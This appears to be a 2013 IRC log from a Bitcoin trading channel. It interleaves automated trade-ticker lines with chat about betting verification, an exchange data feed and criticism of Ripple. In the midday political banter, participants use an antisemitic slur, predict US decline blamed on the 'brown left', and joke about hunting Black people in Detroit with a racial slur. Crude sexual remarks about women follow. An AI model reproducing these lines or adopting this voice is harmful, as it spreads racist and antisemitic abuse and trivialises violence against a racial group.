interest however need some form of "verifiability" what is acceptable proof for the local interest burden of proof? May 28 00:57:53 ah, ok now it makes sense May 28 00:58:47 thestringpuller i recently nuked some ripple bet because all it had for verification was a link to "ripplecharts.com" May 28 00:58:56 apparently nobody independently publishes the xrp/btc rate May 28 01:00:39 so for instance a local football game (high schoolers) would require a published newspaper clipping of some sorts? May 28 01:00:48 independent of the bettors? May 28 01:00:52 betters* May 28 01:01:10 mircea_popescu: does MPEX have a websocket or streaming API for ticker/trades? May 28 01:01:29 fiat500: twitter :P May 28 01:01:34 christ May 28 01:01:39 ;;seen smickles May 28 01:01:39 smickles was last seen in #bitcoin-assets 7 weeks, 4 days, 6 hours, 19 minutes, and 1 second ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm May 28 01:02:00 fiat500 you can get them from the irc bots, fro mtwitter, from rss May 28 01:02:01 assbot gets it from twitter? May 28 01:02:04 read the faq it's all there. May 28 01:02:10 i have socket. May 28 01:03:09 thestringpuller a local football game would be announced somewhere May 28 01:03:50 kakobrekla: do you have terms of use? May 28 01:04:07 [HAVELOCK] [ASICM] 6 @ 0.024794 = 0.1488 BTC [+] May 28 01:04:08 [HAVELOCK] [ASICM] 40 @ 0.024795 = 0.9918 BTC [+] May 28 01:04:12 i have. May 28 01:04:13 http://bitcoin-assets.com/mpex-socket/ May 28 01:04:54 [BTCTC] [ASICMINER-PT] 1 @ 2.4499 BTC [+] May 28 01:05:01 public domain - but do you mind if i use this server-side on a website? May 28 01:05:25 [BTCTC] [ASICMINER-PT] 1 @ 2.44999 BTC [+] May 28 01:05:27 [BTCTC] [ASICMINER-PT] 1 @ 2.4599 BTC [+] May 28 01:05:30 [BTCTC] [ASICMINER-PT] 1 @ 2.45999 BTC [+] May 28 01:05:36 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 28 01:06:31 [BTCTC] [ASICMINER-PT] 6 @ 2.46 = 14.76 BTC [+] May 28 01:06:33 see pm May 28 01:08:07 [HAVELOCK] [ASICM] 30 @ 0.024795 = 0.7439 BTC [+] May 28 01:08:32 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [+] May 28 01:11:35 mircea_popescu: what about say a drinking contest? something not announced. say 10 buddies go to a bar two of them decide to try to out drink the other, people wanna place bets, bitbet.us is what they want to use as the broker May 28 01:11:43 hypothetical that is May 28 01:12:09 there's no practical way to run this tho. May 28 01:12:11 Namworld http://shrani.si/f/15/QG/3M62GmBF/bvps.png May 28 01:12:17 i see May 28 01:12:19 bitbet's rules state the result must be independently verifiable May 28 01:12:19 better off for them to just have trhe bartender run their pool May 28 01:12:39 yea. okay that answers my question May 28 01:12:52 thx bro :D May 28 01:15:57 [BTCTC] [ASICMINER-PT] 2 @ 2.4747 = 4.9494 BTC [+] May 28 01:15:59 [BTCTC] [ASICMINER-PT] 2 @ 2.4748 = 4.9496 BTC [+] May 28 01:17:34 [BTCTC] [ASICMINER-PT] 1 @ 2.4748 BTC [+] May 28 01:18:14 my pleasure May 28 01:18:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.024727 = 0.1236 BTC [+] May 28 01:19:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.0245 = 0.245 BTC [-] May 28 01:21:33 [BTCTC] [PAJKA.BOND] 1 @ 0.10989 BTC [+] May 28 01:31:27 [BTCTC] [TAT.ASICMINER] 12 @ 0.02441 = 0.2929 BTC [-] May 28 01:33:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.02473 = 0.0989 BTC [+] May 28 01:35:02 [BTCTC] [BASIC-MINING] 1 @ 0.5999 BTC [+] May 28 01:37:39 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] May 28 01:39:50 [BTCTC] [TAT.ASICMINER] 44 @ 0.02441 = 1.074 BTC [-] May 28 01:39:52 [BTCTC] [TAT.ASICMINER] 24 @ 0.02441 = 0.5858 BTC [-] May 28 01:44:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.02473 = 0.0495 BTC [+] May 28 01:59:37 oh i forgot there is none :) << now there is :D May 28 02:02:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.024411 = 0.0732 BTC [-] May 28 02:02:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.02432 = 0.4864 BTC [-] May 28 02:03:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.02431 = 0.0486 BTC [-] May 28 02:03:48 [BTCTC] [TAT.ASICMINER] 43 @ 0.024309 = 1.0453 BTC [-] May 28 02:06:31 [MPEX] [S.MPOE] 7500 @ 0.00068638 = 5.1479 BTC [+] May 28 02:06:33 [MPEX] [S.MPOE] 3200 @ 0.00068685 = 2.1979 BTC [+] May 28 02:06:48 [MPEX] [S.MPOE] 4150 @ 0.00068731 = 2.8523 BTC [+] May 28 02:25:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.024729 BTC [+] May 28 02:39:51 [BTCTC] [ASICMINER-PT] 1 @ 2.4739 BTC [-] May 28 02:40:56 [BTCTC] [ASICMINER-PT] 1 @ 2.47499 BTC [+] May 28 02:41:09 [HAVELOCK] [ASICM] 47 @ 0.02478999 = 1.1651 BTC [-] May 28 02:41:39 [BTCTC] [ASICMINER-PT] 1 @ 2.47499 BTC [+] May 28 02:42:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.024729 BTC [+] May 28 02:43:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.02473 = 0.1237 BTC [+] May 28 02:50:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.024729 = 0.0742 BTC [-] May 28 03:07:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.024729 = 0.1731 BTC [-] May 28 03:09:07 [BTCTC] [TAT.ASICMINER] 33 @ 0.02473 = 0.8161 BTC [+] May 28 03:16:07 fiat500: what are you going to use the mpex socket for? May 28 03:17:11 building a data aggregator May 28 03:17:23 nothing remotely ios related May 28 03:17:39 I didn't know you were into bitcoin stuff May 28 03:29:00 [BTCTC] [ASICMINER-PT] 1 @ 2.47499 BTC [+] May 28 03:29:08 [HAVELOCK] [ASICM] 20 @ 0.02478999 = 0.4958 BTC [-] May 28 03:30:38 [BTCTC] [ASICMINER-PT] 1 @ 2.474991 BTC [+] May 28 03:31:12 [HAVELOCK] [SDICE] 1 @ 0.2444 BTC [+] May 28 03:31:22 [BTCTC] [ASICMINER-PT] 7 @ 2.474999 = 17.325 BTC [+] May 28 03:33:50 charybdis: i didnt either (showed up here 2 weeks ago) May 28 03:41:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.02473 = 0.4946 BTC [+] May 28 03:54:54 fiat500 so who are you ? May 28 03:55:45 mircea_popescu: im an ios developer in the cydia (jailbreak) scene May 28 03:55:58 aha May 28 03:56:02 you know copumpkin ? May 28 03:56:06 [MPEX] [S.MPOE] 5988 @ 0.00068591 = 4.1072 BTC [-] May 28 03:56:13 yeah, for about 5 years now May 28 03:56:19 cool. May 28 03:56:22 welcome to btc. May 28 03:56:26 thanks :) May 28 03:56:55 [BTCTC] [PAJKA.BOND] 1 @ 0.10989 BTC [+] May 28 04:00:13 truffles: not sure niceness is a valuable metric when it comes to finance May 28 04:06:57 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 28 04:07:04 [BTCTC] [S.DICE-PT] 1 @ 0.00325 BTC [-] May 28 04:08:32 [BTCTC] [ASICMINER-PT] 1 @ 2.449 BTC [-] May 28 04:20:54 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] May 28 04:20:56 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] May 28 04:21:23 [BTCTC] [ASICMINER-PT] 1 @ 2.449 BTC [-] May 28 04:31:23 [BTCTC] [TAT.ASICMINER] 17 @ 0.02473 = 0.4204 BTC [+] May 28 04:35:08 [HAVELOCK] [ASICM] 21 @ 0.0245 = 0.5145 BTC [-] May 28 04:38:27 ask ukto about anime May 28 04:40:17 [MPEX] [S.MPOE] 1771 @ 0.00068164 = 1.2072 BTC [-] May 28 04:40:19 [MPEX] [S.MPOE] 14629 @ 0.00068152 = 9.97 BTC [-] May 28 04:41:08 [HAVELOCK] [ASICM] 13 @ 0.02478999 = 0.3223 BTC [+] May 28 04:41:09 [HAVELOCK] [ASICM] 197 @ 0.02479 = 4.8836 BTC [+] May 28 04:44:41 [BTCTC] [BITVPS] 1 @ 0.00076 BTC [-] May 28 04:52:17 [BTCTC] [ESECURITYSABTC] 2 @ 0.319998 = 0.64 BTC [+] May 28 04:53:07 [BTCTC] [PAJKA.BOND] 1 @ 0.07 BTC [-] May 28 04:54:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.02454 = 0.0982 BTC [-] May 28 04:54:42 [BTCTC] [ESECURITYSABTC] 1 @ 0.319999 BTC [+] **** BEGIN LOGGING AT Tue May 28 12:14:39 2013 May 28 12:14:53 [BTCTC] [S.DICE-PT] 19 @ 0.003019 = 0.0574 BTC [+] May 28 12:15:24 [BTCTC] [BITVPS] 1 @ 0.000649 BTC [-] May 28 12:15:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.024855 BTC [+] May 28 12:16:02 [HAVELOCK] [SDICE] 6 @ 0.2243 = 1.3458 BTC [-] May 28 12:16:03 [HAVELOCK] [SDICE] 5 @ 0.2242 = 1.121 BTC [-] May 28 12:18:43 [MPEX] [S.MPOE] 4321 @ 0.00068252 = 2.9492 BTC [-] May 28 12:18:45 [MPEX] [S.MPOE] 13279 @ 0.00068226 = 9.0597 BTC [-] May 28 12:24:02 [HAVELOCK] [ASICM] 36 @ 0.0245 = 0.882 BTC [+] May 28 12:24:14 [BTCTC] [TAT.ASICMINER] 200 @ 0.02453 = 4.906 BTC [-] May 28 12:28:13 [BTCTC] [ASICMINER-PT] 13 @ 2.484 = 32.292 BTC [+] May 28 12:28:40 [BTCTC] [ASICMINER-PT] 7 @ 2.485 = 17.395 BTC [+] May 28 12:30:02 [HAVELOCK] [SDICE] 3 @ 0.2243 = 0.6729 BTC [+] May 28 12:31:02 [HAVELOCK] [SDICE] 3 @ 0.2243 = 0.6729 BTC [+] May 28 12:32:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.02485 = 0.1491 BTC [+] May 28 12:33:43 [MPEX] [S.MPOE] 5138 @ 0.00068226 = 3.5055 BTC [-] May 28 12:33:45 [MPEX] [S.MPOE] 2512 @ 0.00067919 = 1.7061 BTC [-] May 28 12:37:08 [BTCTC] [ASICMINER-PT] 1 @ 2.467 BTC [-] May 28 12:38:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02485 = 0.0497 BTC [+] May 28 12:44:18 [BTCTC] [BTC-BOND] 1 @ 0.0105 BTC [+] May 28 12:48:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [+] May 28 12:50:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.02485 = 0.0497 BTC [+] May 28 13:02:27 [MPEX] [S.MPOE] 1386 @ 0.00068314 = 0.9468 BTC [+] May 28 13:02:34 [MPEX] [S.MPOE] 1464 @ 0.00068401 = 1.0014 BTC [+] May 28 13:12:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [+] May 28 13:22:48 mircea_popescu: you around? May 28 13:23:02 [HAVELOCK] [ASICM] 31 @ 0.024598 = 0.7625 BTC [+] May 28 13:23:05 yeh May 28 13:24:06 whats new May 28 13:24:13 i was reading about coinhedger May 28 13:24:19 mpoe-pr is hilarious May 28 13:24:49 lol what did she do nao May 28 13:24:59 some guys are starting an options exchange May 28 13:25:02 [HAVELOCK] [ASICM] 5 @ 0.024599 = 0.123 BTC [+] May 28 13:25:06 cool. May 28 13:25:20 so she said, TradeFortress basically quoted her about keeping your idea "secret" May 28 13:25:30 in that its already been done May 28 13:25:39 and they started by going "the largest options exchange in the history of btc, run by this smart dude with year+ history managed a loss of 17k one month. here's our 20k btc proving we can play" May 28 13:25:44 and if you think your idea will get stolen you probably shouldn't be in any business May 28 13:26:01 [HAVELOCK] [ASICM] 7 @ 0.024599 = 0.1722 BTC [+] May 28 13:26:18 [MPEX] [S.MPOE] 1809 @ 0.00067919 = 1.2287 BTC [-] May 28 13:26:18 and that was very impressive actually May 28 13:26:32 [MPEX] [S.MPOE] 3652 @ 0.00067918 = 2.4804 BTC [-] May 28 13:26:34 [MPEX] [S.MPOE] 8489 @ 0.00067918 = 5.7656 BTC [-] May 28 13:26:35 oh by the way, i have the map features working roughly in the app i'm building May 28 13:26:47 cool! May 28 13:26:50 if you want to see May 28 13:27:01 buttonwood.btcshares.com May 28 13:27:02 [HAVELOCK] [ASICM] 25 @ 0.024598 = 0.615 BTC [-] May 28 13:27:08 starting to come together May 28 13:27:24 well i don't have a browser capable of rendering that atm May 28 13:27:28 so nice black screen :D May 28 13:27:53 lol May 28 13:28:03 has some cool order update features May 28 13:28:42 worked pretty decently yesterday May 28 13:33:41 i'ma give it a gander off a dirty system sometime May 28 13:36:02 [HAVELOCK] [ASICM] 1 @ 0.024699 BTC [+] May 28 13:36:35 sounds good May 28 13:36:43 so what else is new? May 28 13:36:56 my party! May 28 13:37:17 what party is this? May 28 13:37:43 there's this extreme right wing romanian party that imploded last year May 28 13:37:55 ima push the leftovers to teh political forefront. May 28 13:38:24 cool, sounds great May 28 13:38:37 indeed. this "run to belize" bullshit has to cease. May 28 13:38:52 we need a country respectful of both entrepreneurs and the future. May 28 13:40:07 yes May 28 13:40:11 as apple is showing May 28 13:40:46 i find it hilarious that they won't bring billions of dollars back to the US May 28 13:40:55 and instead just do a debt offering here May 28 13:41:02 nice policies uS May 28 13:41:05 indeed. May 28 13:41:09 make debt cheap and taxes onerous May 28 13:41:17 what do you think a rational person would do? May 28 13:41:25 depends what resources they have. May 28 13:41:28 true May 28 13:41:30 i'm starting a party. May 28 13:41:32 like apple gives a shit about anything other than their massive 150 billion jew stash May 28 13:41:38 lol May 28 13:41:41 everyone else probably just make sure they're friends with me lol May 28 13:41:48 Scrat why should they ? May 28 13:42:03 like i said, you basically make money by going into debt in the US May 28 13:42:24 yup. so basically the rational play is take as much us debt as possible, May 28 13:42:27 if you believe that inflation is not priced in correctly May 28 13:42:31 yep May 28 13:42:31 and turn it as soon as feasible into actual value May 28 13:42:34 exactly May 28 13:42:38 and expatriate it. either before or after. May 28 13:42:42 hehehe, yep May 28 13:42:56 in fact, we were talking yesterday about perpetuities May 28 13:43:05 the US should look into offering perpetuities May 28 13:43:06 with all the brilliant policies of the brown left the US will be a sort of congo in a generation May 28 13:43:14 we'll go on jungle safari in Detroit May 28 13:43:17 hunt niggas. May 28 13:43:30 your on your own there May 28 13:43:36 lol May 28 13:43:47 well i don't go on safaris in africa as it is either May 28 13:43:50 but the sad point remains. May 28 13:44:07 i'm thinking panama (gonna visit soon) May 28 13:44:22 i don't like it. hot and humid. you're like trapped in a vagina May 28 13:44:41 well, we will see, it gets a chance too, though romania is hard to beat May 28 13:45:02 i've told everyone i met that I would happily live in Romania May 28 13:45:02 everything should get a chance. May 28 13:45:45 what kind of drugs does max keiser take? May 28 13:45:59 eh, just you wait for the elections. if my guys get the mayor and a 3rd place in parliament it's teh end. May 28 13:46:02 jacksbueller jarpiain jborkl_ jezzz joeykrim JohnGalt jorcuhodIn jordandotdev JTM29 jurov JWU42 May 28 13:46:21 the end as in Romania will be the best place to live? May 28 13:48:16 [BTCTC] [S.DICE-PT] 49 @ 0.003019 = 0.1479 BTC [+] May 28 13:48:17 [BTCTC] [S.DICE-PT] 19 @ 0.002701 = 0.0513 BTC [-] May 28 13:48:21 [BTCTC] [S.DICE-PT] 100 @ 0.00262 = 0.262 BTC [-] May 28 13:49:02 [HAVELOCK] [ASICM] 16 @ 0.024301 = 0.3888 BTC [-] May 28 13:50:58 yup May 28 13:51:42 can't wait to go back May 28 13:54:06 it wooont be looong now May 28 13:55:24 lol so glad about your post on ripple May 28 13:56:18 so funny May 28 13:56:25 :p May 28 13:56:29 they bill the fact that their CTO came from Mt. Gox as a good thing May 28 13:56:32 obviously he has experience May 28 13:57:01 yeah, in fraud and conversion. May 28 13:59:28 [BTCTC] [ASICMINER-PT] 8 @ 2.48 = 19.84 BTC [+] May 28 13:59:45 LOL May 28 13:59:58 its open source (in the future) once we are finished building the code May 28 14:00:04 do they not know what open source means? May 28 14:00:09 this is so backwards May 28 14:00:18 the entire fucking point of the foss is to build code. May 28 14:00:30 yes exactly May 28 14:00:50 they're trying too hard too place the word open everywhere May 28 14:00:54 once we build it we will release the code, why not let others work on it now? May 28 14:00:55 opencoin, openthis, openthat May 28 14:01:02 open my fucking ass May 28 14:01:20 and they say "walled garden that is finance now" so come join our walled garden May 28 14:01:26 fucking ridiculous May 28 14:01:27 I'd rather not May 28 14:01:30 me neither May 28 14:01:51 thanks be to satoshi for TradeFortress's social experiment May 28 14:01:54 lol May 28 14:02:20 apparently, you can change the trust settings so it won't by default equate anyones coins with an exchanges coins May 28 14:02:30 or coin IOU's i should say May 28 14:02:45 but what i am curious about is what happens when everyone in the system does this behaviour May 28 14:02:52 which is the only rational thing to do May 28 14:02:55 indeed May 28 14:03:06 no debt can "ripple" through your account May 28 14:03:17 so doesn't the whole thing kinda break down without everyone trusting? May 28 14:03:30 I have fecal matter rippling through my intestines right now May 28 14:03:44 brb May 28 14:03:52 open your ass again May 28 14:03:55 TBH, I don't think that OpenCoin's hilariously bad presentation and ponzi is the real problem with ripple, i think that it is a fundamentally bad system May 28 14:04:01 looks like its about to be rippling through your anus May 28 14:04:06 open my fucking ass http://polimedia.us/dtng/c/src/128236166043.jpg May 28 14:04:22 that could've been worse to click on May 28 14:04:37 Scrat: no thank you May 28 14:04:44 goatse came to mind May 28 14:04:46 oh god May 28 14:04:56 stool sample May 28 14:05:16 which is the only rational thing to do << nonsense. who rational is involved ? May 28 14:05:56 fiat500 open your ass or openass will open it for you. May 28 14:06:00 closed sauce. May 28 14:06:40 [BTCTC] [PAJKA.BOND] 2 @ 0.10989 = 0.2198 BTC [+] May 28 14:06:42 [BTCTC] [PAJKA.BOND] 8 @ 0.109989 = 0.8799 BTC [+] May 28 14:06:45 mp: what's that tool do? May 28 14:06:50 colonoscopy? May 28 14:06:53 never had one May 28 14:06:54 joelkatz's btctalk trust -5: -1 / +0(0) May 28 14:06:57 wondering what the hell andreessen horrowitz were thinking May 28 14:07:01 Scrat it removes some shit from your gut,. May 28 14:07:24 does it go that deep? May 28 14:07:27 fiat500 they were thinking they don't want to http://trilema.com/2013/the-future-of-bitcoin-regulation/ May 28 14:07:48 damientrog it's not really that deep. any woman can comfortably fit an average penis in her colon. May 28 14:08:04 not without crying May 28 14:08:21 sure. if you know what you're doing. May 28 14:08:32 trust me, I know what I'm doing May 28 14:08:48 reminds me of sledgehammer series somehow May 28 14:08:50 ^lol May 28 14:08:55 lolk. May 28 14:09:01 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [+] May 28 14:09:11 about 50% actually enjoy their anal defloration. again, iykwyad. May 28 14:09:38 I think I need a bigger sample population to be sure though May 28 14:09:49 to work! May 28 14:09:57 "drown in words" technique May 28 14:09:59 lol May 28 14:10:00 yeah, this is work science woman! May 28 14:12:25 bwahaha https://bitcointalk.org/index.php?topic=206792.msg2293881#msg2293881 May 28 14:12:28 class action lollersuit May 28 14:15:02 [HAVELOCK] [SDICE] 2 @ 0.2241 = 0.4482 BTC [-] May 28 14:15:03 hahhaa May 28 14:15:21 anyway, i think ripple is fundamentally flawed in that debt is not fungible May 28 14:15:25 Josh will sooner will be degutted with a machette than that working out May 28 14:17:21 damientrog a machette fdull of fans. May 28 14:17:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.0246 = 0.123 BTC [-] May 28 14:17:52 [BTCTC] [TAT.ASICMINER] 87 @ 0.0246 = 2.1402 BTC [-] May 28 14:17:53 [BTCTC] [TAT.ASICMINER] 8 @ 0.024541 = 0.1963 BTC [-] May 28 14:18:13 mjr_ in that debt is not fungible, in that liquidity is not free, in that information is never symmetrical and in that closed models don't work fopr that application May 28 14:18:41 also in that nobody cares, in that execution is appaling, in that their resources are insufficient etc. May 28 14:22:24 It doesnt seem that ripple has much going for it these days. What else is there to a model outside of cyber currency besides XRP? May 28 14:22:43 -to, +for May 28 14:23:11 not much. May 28 14:23:20 Wait a minute..anal defloration May 28 14:23:22 a reimplementation of ripple, correctly, openly, may be a good idea. May 28 14:23:30 i think erik's talk on the moneyness of bitcoin is one of the best things written about it May 28 14:23:33 that'd possibly have common points with open transactions May 28 14:24:09 but is there a need for this? as maybe a broker between cyber currency and everything else? credit? fiat? May 28 14:24:14 my favorite point that shows people how stupid ripple is, is that more than 75% (by my estimation) of transactions thus far have waited for 1 or less confirmations May 28 14:24:42 that to me says its poppycock May 28 14:24:43 so, bitcoin is plenty fast May 28 14:24:47 KRS-1 there's no appreciable need for it per se, but it's novel enough that it may be one of those where the need arises after the fact. May 28 14:26:53 Looking for a web developer interested in a new project #bitcoin related. Get in touch big opportunities #webdeveloper May 28 14:26:57 [BTCTC] [TAT.ASICMINER] 8 @ 0.024799 = 0.1984 BTC [+] May 28 14:26:58 LOL May 28 14:26:59 [BTCTC] [TAT.ASICMINER] 17 @ 0.02485 = 0.4225 BTC [+] May 28 14:27:02 off twitter May 28 14:27:19 lolk May 28 14:28:02 [BTCTC] [TAT.ASICMINER] 8 @ 0.02485 = 0.1988 BTC [+] May 28 14:29:33 [MPEX] [S.MPOE] 10236 @ 0.00068401 = 7.0015 BTC [+] May 28 14:29:35 [MPEX] [S.MPOE] 4321 @ 0.00068477 = 2.9589 BTC [+] May 28 14:29:36 [BTCTC] [TAT.ASICMINER] 52 @ 0.024855 = 1.2925 BTC [+] May 28 14:29:46 [MPEX] [S.MPOE] 1454 @ 0.00068478 = 0.9957 BTC [+] May 28 14:30:35 new bitcoin project, sounds amazing May 28 14:31:05 let me guess the pitch starts with "its like but with bitcoins!" May 28 14:33:03 From what I am seeing come two things 1) Either XRP/Ripple is way before its time or 2) BTC did not have enough features/attributes built-in. May 28 14:33:26 probably #2 May 28 14:34:36 huh? May 28 14:34:54 btc already does everything ripple does, and people haven't even implemented all the features it does have May 28 14:35:06 that is another point i dislike about ripple May 28 14:35:14 "fully compliant trusted gateways" May 28 14:35:23 they have no magic compliance behind them May 28 14:35:45 anything that a ripple trusted gateway can do, a bitcoin exchange can also do May 28 14:35:46 oh wow then that is really cool. May 28 14:35:50 i did not know that May 28 14:36:10 then wtf were the folks at ripple doing May 28 14:36:42 interesting accounting system really May 28 14:36:46 is all they are offering May 28 14:36:54 well no..im seeing more to this May 28 14:36:56 no actual money moves across ripple just iou's May 28 14:37:04 lmao May 28 14:37:10 a bitcoin exchange centralizes the model, while ripple keeps it decentralized May 28 14:37:12 what's the diff between "actual money" and "iou" ? May 28 14:37:18 LOL May 28 14:37:27 no ripple just moves it between centralized exchanges May 28 14:37:37 ohh pfft then. May 28 14:37:38 that is the point, where do i go to pick up my cash May 28 14:37:48 i think the parasitism angle is probably the best description. May 28 14:37:51 people make things way too complicated May 28 14:37:57 people like X, let's make an ipad version. May 28 14:38:02 yes May 28 14:38:12 mjr_ you just said it best. "people make things way too complicated" May 28 14:38:15 or w/e, a hot topic version May 28 14:38:32 Mmm! Hot Topic girls. May 28 14:38:36 My fav. May 28 14:39:16 so yeah May 28 14:39:35 if i want cash i can actually spend somewhere, i have to get cash in bitstamp and have them wire it to my bank account May 28 14:39:46 oh wait, i could have done thta with bitcoin except had more options on how to cash out May 28 14:40:50 mjr_ imagine if somebody coded a bitcoin client which random,ly replaced your btc balance with ltc May 28 14:40:53 or novacoin May 28 14:41:16 http://cdn.gagbay.com/2013/01/did_someone_say_sale_at_hot_topic-216955.jpg May 28 14:41:31 yeah May 28 14:41:53 http://i3.kym-cdn.com/photos/images/original/000/279/814/d14.jpg May 28 14:43:34 oh god..lol that really happens May 28 14:43:41 like..if your mom has really hot panties. May 28 14:43:45 so I heard May 28 14:43:48 hahaha May 28 14:44:25 poor mom May 28 14:47:08 Chris Larsen: Ripple is HTTP for money May 28 14:47:12 LOL May 28 14:47:24 so how many of the http's did the internet foundation hold back for themselves? May 28 14:47:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.024855 BTC [+] May 28 14:49:02 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [+] May 28 14:50:00 lol is this on twitter ? May 28 14:50:24 http://1.bp.blogspot.com/--Zgx1R2SnQU/TivYyRL_KaI/AAAAAAAAINE/qSpTi-JLYS0/s1600/atkinson+hot+girls+uk.jpg this has got to be a chop May 28 14:51:01 nice\ May 28 14:53:10 [BTCTC] [TAT.ASICMINER] 17 @ 0.024855 = 0.4225 BTC [+] May 28 15:03:58 122,000 new medical diagnostic codes doctors will have to use in order to inform the government about injuries sustained by Americans. Those codes, said Sen. Paul, a medical doctor himself, include line-items for 'injuries sustained from a turtle,' 'walking into a lamppost' and 'injuries sustained from burning water skis.' May 28 15:08:35 [BTCTC] [TAT.ASICMINER] 83 @ 0.024855 = 2.063 BTC [+] May 28 15:10:35 [BTCTC] [COGNITIVE] 1 @ 0.29 BTC [+] May 28 15:14:02 [HAVELOCK] [ASICM] 48 @ 0.0246 = 1.1808 BTC [+] May 28 15:14:04 [HAVELOCK] [ASICM] 42 @ 0.0246 = 1.0332 BTC [+] May 28 15:24:16 [MPEX] [S.MPOE] 3250 @ 0.00067966 = 2.2089 BTC [-] May 28 15:33:02 [HAVELOCK] [ASICM] 40 @ 0.0246 = 0.984 BTC [+] May 28 15:34:28 [BTCTC] [BASIC-MINING] 1 @ 0.569999 BTC [+] May 28 15:35:13 [MPEX] [S.MPOE] 2800 @ 0.00068093 = 1.9066 BTC [+] May 28 15:37:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.024553 = 0.0491 BTC [-] May 28 15:37:07 [BTCTC] [TAT.ASICMINER] 98 @ 0.024553 = 2.4062 BTC [-] May 28 15:39:37 [BTCTC] [CRYPTO-TRADE] 12 @ 0.2 = 2.4 BTC [+] May 28 15:44:34 mircea_popescu: isnt that mr bean's daughter May 28 15:45:40 [BTCTC] [PAJKA.BOND] 1 @ 0.109989 BTC [+] May 28 15:46:22 [BTCTC] [BTC-BOND] 10 @ 0.01045 = 0.1045 BTC [-] May 28 15:46:26 [BTCTC] [TAT.ASICMINER] 46 @ 0.0247 = 1.1362 BTC [+] May 28 15:47:36 possibly. May 28 15:47:49 except the atkinson hawttie isn't related to rowan May 28 15:50:12 [BTCTC] [S.MPOE-PT] 1 @ 0.000668 BTC [-] May 28 15:50:27 [BTCTC] [TAT.ASICMINER] 11 @ 0.02485 = 0.2734 BTC [+] May 28 15:52:11 [BTCTC] [BASIC-MINING] 1 @ 0.569999 BTC [+] May 28 16:07:18 [BTCTC] [S.DICE-PT] 1 @ 0.002979 BTC [+] May 28 16:15:02 [HAVELOCK] [ASICM] 82 @ 0.0246 = 2.0172 BTC [+] May 28 16:16:21 [MPEX] [S.MPOE] 1071 @ 0.00067966 = 0.7279 BTC [-] May 28 16:16:23 [MPEX] [S.MPOE] 10065 @ 0.00067952 = 6.8394 BTC [-] May 28 16:16:37 [MPEX] [S.MPOE] 3163 @ 0.00067918 = 2.1482 BTC [-] May 28 16:16:39 [MPEX] [S.MPOE] 6600 @ 0.00067896 = 4.4811 BTC [-] May 28 16:16:51 [MPEX] [S.MPOE] 6300 @ 0.00067865 = 4.2755 BTC [-] May 28 16:16:53 [MPEX] [S.MPOE] 10714 @ 0.00067811 = 7.2653 BTC [-] May 28 16:16:56 [MPEX] [S.MPOE] 7437 @ 0.00067571 = 5.0253 BTC [-] May 28 16:27:24 [BTCTC] [BITVPS] 1 @ 0.000639 BTC [-] May 28 16:27:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.024819 = 0.0496 BTC [-] May 28 16:28:01 [HAVELOCK] [ASICM] 5 @ 0.0246 = 0.123 BTC [+] May 28 16:28:30 [BTCTC] [TAT.ASICMINER] 25 @ 0.024819 = 0.6205 BTC [-] May 28 16:29:14 [BTCTC] [BASIC-MINING] 1 @ 0.569998 BTC [-] May 28 16:29:18 [BTCTC] [BASIC-MINING] 1 @ 0.589 BTC [+] May 28 16:29:20 [BTCTC] [BASIC-MINING] 2 @ 0.599 = 1.198 BTC [+] May 28 16:31:32 [BTCTC] [S.DICE-PT] 18 @ 0.002979 = 0.0536 BTC [+] May 28 16:31:34 [BTCTC] [S.DICE-PT] 100 @ 0.002979 = 0.2979 BTC [+] May 28 16:32:04 [BTCTC] [S.DICE-PT] 1 @ 0.00298 BTC [+] May 28 16:38:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.024561 = 0.0491 BTC [-] May 28 16:38:23 [BTCTC] [TAT.ASICMINER] 22 @ 0.02456 = 0.5403 BTC [-] May 28 16:38:25 [BTCTC] [TAT.ASICMINER] 25 @ 0.02456 = 0.614 BTC [-] May 28 16:38:26 [BTCTC] [TAT.ASICMINER] 189 @ 0.02456 = 4.6418 BTC [-] May 28 16:38:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.02456 = 0.0737 BTC [-] May 28 16:38:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.02482 BTC [+] May 28 16:39:00 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 28 16:40:47 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 28 16:41:02 [HAVELOCK] [HIM] 2 @ 2.7 = 5.4 BTC [+] May 28 16:41:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.024601 BTC [-] May 28 16:41:58 [BTCTC] [TAT.ASICMINER] 15 @ 0.0246 = 0.369 BTC [-] May 28 16:42:00 [BTCTC] [TAT.ASICMINER] 70 @ 0.024555 = 1.7189 BTC [-] May 28 16:42:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.024551 = 0.2701 